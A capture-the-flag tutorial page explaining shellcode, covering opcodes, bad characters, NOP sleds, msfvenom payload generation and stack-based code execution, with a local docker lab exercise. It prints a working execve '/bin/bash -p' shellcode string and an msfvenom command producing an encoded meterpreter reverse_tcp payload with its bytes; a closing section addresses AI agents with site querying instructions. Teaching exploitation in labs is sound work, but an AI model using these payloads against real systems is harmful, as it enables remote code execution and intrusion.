# Shellcode

A shellcode is a string of characters that represent an executable binary.

Here is a shellcode example that performs an `execve` call on `/bin/bash -p` ([taken from exploit-db](https://www.exploit-db.com/shellcodes/13697)) :

```python
shellcode = "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80";
```

## Opcode to string

In assembly language, opcodes are typically represented by mnemonic codes, such as "ADD" or "MOV", that are easier for humans to understand. These codes are then translated into machine code, which consists of a series of binary digits (0s and 1s) that the CPU can execute.

For example, for [x86 architecture computers](/pwn/architectures/x86-x64.md), the opcode `0x6A` (in binary `01101010`) corresponds to the `push` instruction (add a value to the top of the stack). Therefore, the instruction `0x6A 0x14` (`01101010 00010100`) corresponds to push `0x14` (add the hexadecimal value `0x14` , or `20` in decimal, to the top of the stack).

Then its possible to create a string that chain many of these opcodes ( such as the shellcode example showed in introduction ) and if the instruction pointer point these opcode, it will be executed as standard compiled program.

## Bad chars

When creating shellcodes, some characters may be forbidden for various reasons. For example, the null byte may terminate the string, or the program may filter out certain bytes. These chard are called "**bad chars**" or "**invalid chars**".

Here is the common 4 bad chars :

* 00 -> NULL
* 0A -> new line -> 
* 0D -> Cariage return -> 
* FF -> Page break ->`\f`

## NOPcode

NOP (no operation) instructions do exactly what they sound like: *nothing*.Which makes then very useful for shellcode exploits, because all they will do is run the next instruction.

If the exploit is padded on the left with NOPs and point EIP at the middle of them, it'll simply keep doing no instructions until it reaches the real shellcode. This allows a greater margin of error as a shift of a few bytes forward or backwards won't affect the payload.

This padding with NOPs is often called a NOP slide or NOP sled, since the EIP is essentially sliding down them.

## Generate shellcode

Many shell code could be find on the internet. An other way is to generate it with tools such as msfvenom :

<pre class="language-bash"><code class="lang-bash"><strong>msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 -f c -e x86/countdown
</strong>
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/countdown
x86/countdown succeeded with size 139 (iteration=0)
x86/countdown chosen with final size 139
Payload size: 139 bytes
Final size of c file: 610 bytes
unsigned char buf[] = 
"\x6a\x7a\x59\xe8\xff\xff\xff\xff\xc1\x5e\x30\x4c\x0e\x07\xe2"
"\xfa\x6b\x08\x5d\x35\xde\xf1\xe4\x5b\x4a\x59\x61\x0e\xbd\x68"
"\x86\xf1\xdc\x92\x84\x4f\x7d\x69\x17\x18\x18\x72\x19\x1c\x18"
"\x27\x96\xc1\x4b\x44\x7b\x74\x74\x71\xae\xc9\x6a\xe7\xab\xa9"
"\xed\x57\x36\x7e\x45\x0f\x5b\x96\x35\x36\x37\x60\x53\x3a\x51"
"\x39\xb4\xdd\x0e\x89\x8c\xc2\xc6\x84\x3c\xfb\xac\x6f\xfb\x4d"
"\xf2\x4c\x5d\x4e\x4f\xd9\xb2\x93\xb8\x58\x94\xb5\x5b\xe8\x24"
"\x97\xdb\xd9\x9d\x26\x4f\x3b\xe8\x83\xfa\xd6\x0f\xd6\x64\xa5"
"\xe9\xef\xab\x14\x6f\x91\x8e\xc8\x70\x72\x73\x74\xce\x77\x77"
"\x78\x79\xb7\xfb";
</code></pre>

{% hint style="info" %}
The x86/countdown encoder will remove the most commons bad chars
{% endhint %}

In intel x86 assembly, NOP instructions are `\x90`.

## Exploitation

In order to perform an arbitrary code execution, a shell code will be sent into the user input and the instruction pointer must be rewritten to jump into the shell code rather than the next intended instruction.

To rewrite the stack pointer, any techniques can be used such as [buffer overflow](/pwn/stack-exploitation/stack-buffer-overflow.md) or [format string exploitation](/pwn/stack-exploitation/format-string.md).

{% hint style="warning" %}
The stack must be executable in order to execute a shellcode

Here is a command to know the stack flags :

```
$ readelf -l chall | grep GNU_STACK

Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x4
```

{% endhint %}

## Exercice

If you want to try this exploit by yourself, you can pull [this docker image](https://hub.docker.com/r/thectfrecipes/pwn/general) :

```
docker pull thectfrecipes/pwn:data_edit
```

Deploy the image using the followed command :

```
docker run --name format_string_data_edit -it --rm -d -p 3000:3000 thectfrecipes/pwn:data_edit
```

Access to the web shell with your browser at the address : `http://localhost:3000/`

```
login: challenge
password: password
```

## Resources

{% embed url="<https://ir0nstone.gitbook.io/notes/types/stack/shellcode>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/arbitrary-code-execution.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.